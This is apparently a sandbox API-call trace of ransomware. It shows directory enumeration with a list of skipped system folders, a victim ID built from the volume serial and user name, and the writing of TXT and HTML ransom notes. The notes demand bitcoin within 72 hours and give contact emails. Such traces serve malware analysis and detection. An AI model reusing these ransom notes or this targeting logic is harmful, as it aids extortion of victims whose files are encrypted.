	[0167.238] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DataMart\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\datamart\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0167.238] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0167.238] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.238] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0167.239] CloseHandle (hObject=0x384) returned 1
	[0167.239] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DataMart\\*.*" (normalized: "c:\\users\\all users\\microsoft\\datamart\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7d345f72, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0167.239] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\DataMart\\*.*") returned 41
	[0167.239] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.240] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DataMart\\*.*", cchLength=0x29 | out: lpsz="c:\\users\\all users\\microsoft\\datamart\\*.*") returned 0x29
	[0167.240] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.240] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="windows") returned 0x0
	[0167.240] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.240] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="boot") returned 0x0
	[0167.240] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.240] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="system volume information") returned 0x0
	[0167.240] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.241] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.241] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.241] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="temp") returned 0x0
	[0167.241] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.241] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="program files") returned 0x0
	[0167.241] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.241] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.242] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="appdata") returned 0x0
	[0167.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.242] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="application data") returned 0x0
	[0167.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.242] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="winnt") returned 0x0
	[0167.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.243] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="tmp") returned 0x0
	[0167.243] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.243] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="cache") returned 0x0
	[0167.243] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.243] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.243] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.244] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="webcache") returned 0x0
	[0167.244] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.244] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="inetcache") returned 0x0
	[0167.244] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.244] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="nvidia") returned 0x0
	[0167.244] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.244] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="packages") returned 0x0
	[0167.245] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.245] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="cookies") returned 0x0
	[0167.245] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.245] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="programdata") returned 0x0
	[0167.245] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0167.245] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0167.245] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7d345f72, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.246] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0167.246] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d345f72, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d345f72, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d36bfed, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0167.246] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d345f72, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d345f72, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d345f72, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0167.246] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PaidWiFi", cAlternateFileName="")) returned 1
	[0167.246] lstrcmpW (lpString1="PaidWiFi", lpString2="..") returned 1
	[0167.246] lstrcmpW (lpString1="PaidWiFi", lpString2=".") returned 1
	[0167.246] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\DataMart" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart") returned="C:\\Users\\All Users\\Microsoft\\DataMart"
	[0167.246] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart\\") returned="C:\\Users\\All Users\\Microsoft\\DataMart\\"
	[0167.247] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart\\", lpString2="PaidWiFi" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi") returned="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi"
	[0167.247] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi") returned="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi"
	[0167.247] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\") returned="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\"
	[0167.247] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\") returned="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\"
	[0167.247] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\*.*") returned="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\*.*"
	[0167.247] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\*.*" (normalized: "c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0167.248] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\*.*") returned 50
	[0167.248] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.248] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\*.*", cchLength=0x32 | out: lpsz="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*") returned 0x32
	[0167.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.248] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="windows") returned 0x0
	[0167.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.248] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="boot") returned 0x0
	[0167.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.249] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="system volume information") returned 0x0
	[0167.249] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.249] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.249] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.249] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="temp") returned 0x0
	[0167.249] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.249] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="program files") returned 0x0
	[0167.249] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.249] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.249] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.250] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="appdata") returned 0x0
	[0167.256] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.256] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="application data") returned 0x0
	[0167.256] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.257] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="winnt") returned 0x0
	[0167.257] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.257] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="tmp") returned 0x0
	[0167.257] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.257] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="cache") returned 0x0
	[0167.257] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.257] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.258] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.258] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="webcache") returned 0x0
	[0167.258] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.258] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="inetcache") returned 0x0
	[0167.258] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.258] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="nvidia") returned 0x0
	[0167.258] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.259] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="packages") returned 0x0
	[0167.259] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.259] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="cookies") returned 0x0
	[0167.259] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.259] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="programdata") returned 0x0
	[0167.259] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.259] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0167.260] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0167.260] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0167.260] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi") returned="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi"
	[0167.260] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\*.*") returned="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\*.*"
	[0167.261] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.261] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.261] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\HELP_DECRYPT_YOUR_FILES.TXT") returned 74
	[0167.261] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\datamart\\paidwifi\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0167.262] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0167.262] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0167.265] CloseHandle (hObject=0x388) returned 1
	[0167.267] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.267] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.267] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0167.269] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0167.269] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\datamart\\paidwifi\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0167.269] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0167.269] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0167.269] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0167.270] CloseHandle (hObject=0x388) returned 1
	[0167.270] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.270] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.271] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0167.271] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\HELP_DECRYPT_YOUR_FILES.HTML") returned 75
	[0167.271] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\datamart\\paidwifi\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0167.271] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0167.271] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0167.274] CloseHandle (hObject=0x388) returned 1
	[0167.275] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.275] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.276] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.276] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0167.277] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.277] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\datamart\\paidwifi\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0167.277] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0167.278] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.278] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0167.278] CloseHandle (hObject=0x388) returned 1
	[0167.278] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\*.*" (normalized: "c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7d3b8412, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0167.279] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\*.*") returned 50
	[0167.279] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.279] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\*.*", cchLength=0x32 | out: lpsz="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*") returned 0x32
	[0167.279] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.279] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="windows") returned 0x0
	[0167.279] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
